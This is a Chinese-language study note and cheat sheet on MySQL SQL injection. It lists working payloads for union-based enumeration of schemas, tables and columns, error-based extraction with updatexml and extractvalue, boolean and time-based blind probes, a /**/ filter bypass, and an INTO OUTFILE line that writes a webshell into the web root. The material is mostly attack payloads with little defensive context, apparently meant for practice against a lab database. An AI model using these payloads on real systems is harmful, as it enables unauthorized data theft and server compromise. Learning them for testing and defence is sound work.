sql注入

sql基础知识

查看数据库：show databases
选中数据库：use [数据库名]
查看表：show tables
查看表内容：select * from [表名] where [条件]
合并查询：union
数据库版本：version()
数据库名：database()

insert：插入
delete：删除
updata：修改
order by：排序

information_schema库

• mysql版本大于5.0版本都有information_schema库
• information_schema库中的三张重要表：

SCHEMATA表：所有数据库信息（重要的列：schema_name）
TABLES表：所有表信息 （重要的列：table_name，table_schema）
COLUMNS表：所有列信息 （重要的列：column_name，table_schema）

手工注入

查看数据库：
union select 1,group_concat(schema_name)from information_schema.schemata

查看数据库的表：
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

查看表的信息：
union select 1,group_concat(column_name)from  information_schema.columns where table_schema=database() and table_name=[表名]

• 获取MySQL数据库的全局系统变量secure_priv的值:

-1 union select 1,(select@@global.secure_priv),3
这个变量指定了包含MySQL权限表的目录的路径

• into outfile
• INTO OUTFILE是 MySQL 数据库中的一个语句，用于将查询的结果直接输出到服务器上的文件中。这个语句通常用于将表中的数据导出到文本文件或 CSV 文件中。

into outfile '/var/www/html/webshell.php' #

盲注

报错注入

• updatexml()函数

-1 and updatexml(0,concat(0x7e,database(),0x7e),0)
-1 and updatexml(0,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='vul'),0x7e),0)

• extractvalue（）函数

1 and (extractvalue(1,concat(0x7e,(select database()),0x7e)))

布尔注入

判断数据库长度：输入1' and length(database())>2 #
判读数据库的第一个字符：1' and ascii(substr(database(),1,1))>65 #
猜测数据库的表的数量：1' and (select count(*) from information_schema.tables where table_schema='vul')=3 #
第一张表长度为：1' and length((select table_name from information_schema.tables where  table_schema='vul' limit 0,1))=4 #

时间盲注

判断是否执行sleep（）函数：1 and if(1=1,sleep(5),1) # 有延时5秒说明执行。
猜测数据库：1 and if(database()='vul',sleep(5),1) #

• 布尔注入和时间盲注不是人干的活，交给工具

空格过滤

• 用 /**/替换空格
• 用/**/将sql语句隔开使其可以正常执行